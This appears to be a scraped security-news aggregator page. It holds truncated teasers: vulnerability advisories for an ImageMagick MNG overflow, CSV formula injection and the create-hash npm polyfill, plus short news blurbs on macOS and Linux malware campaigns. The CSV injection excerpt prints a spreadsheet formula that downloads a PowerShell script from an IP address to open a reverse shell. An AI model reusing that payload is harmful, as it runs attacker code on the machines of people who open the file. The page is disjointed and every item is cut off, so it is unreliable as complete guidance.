#mac

## **Vulnerability Details** The magnified size calculations in `ReadOneMNGIMage` (in `coders/png.c`) are unsafe and can overflow, leading to memory corruption. The source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured. ```c static Image *ReadOneMNGImage(MngReadInfo* mng_info, const ImageInfo *image_info,ExceptionInfo *exception) { // Lots of stuff, this is effectively a state machine for the MNG rendering commands, // skip to the point where we start processing the "MAGN" command. if (memcmp(type,mng_MAGN,4) == 0) { png_uint_16 magn_first, magn_last, magn_mb, magn_ml, magn_mr, magn_mt, magn_mx, magn_my, magn_methx, magn_methy; // Details unimportant, but each of the `magn_xxx` variables is read from the file. if (magn_first == ...

“AI isn’t coming, it’s already here. The question is, are you ready?” That’s the brutal reality of a…

A popular shortwave Russian radio station dubbed “UVB-76” has been an enigma for decades. But its recent messages have turned it into a tool for Kremlin saber-rattling.

Apple fixes CVE-2025-43300, a flaw letting hackers hijack devices via malicious images. Users urged to update iPhone, iPad,…

Plus: Google wants billions of Chrome users to install an emergency fix, Kristi Noem is on the move, and North Korean IT workers are everywhere.

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing…

### Summary Description: `CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text. ### Details A basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe​ using​ command: `=cmd|' /C calc'!A0​` The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. *Payload*: > This is our payload and will be used in the vulnerable field during exploitation ``` =cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypas...

Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell. The "Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file," Trellix researcher Sagar Bade said in a technical write-up. "The payload isn't hidden inside the file content or a macro, it's encoded directly

The growing ecosystem of agents, chatbots, and machine credentials that outnumber human users by an order of magnitude is creating a poorly understood but potentially major security issue.

### Summary This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package Also affects `create-hmac` and other packages Node.js `createHash` works only on strings or instances of Buffer, TypedArray, or DataView. Missing input type checks in npm `create-hash` polyfill of Node.js `createHash` lead to it calculating invalid values, hanging, rewinding the hash state (including turning a tagged hash into an untagged hash) on malicious JSON-stringifyable input ### Details See PoC ### PoC ```js const createHash = require('create-hash/browser.js') const { randomBytes } = require('crypto') const sha256 = (...messages) => { const hash = createHash('sha256') messages.forEach((m) => hash.update(m)) return hash.digest('hex') } const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe') const receivedMessage = JSON.parse(payload) // e....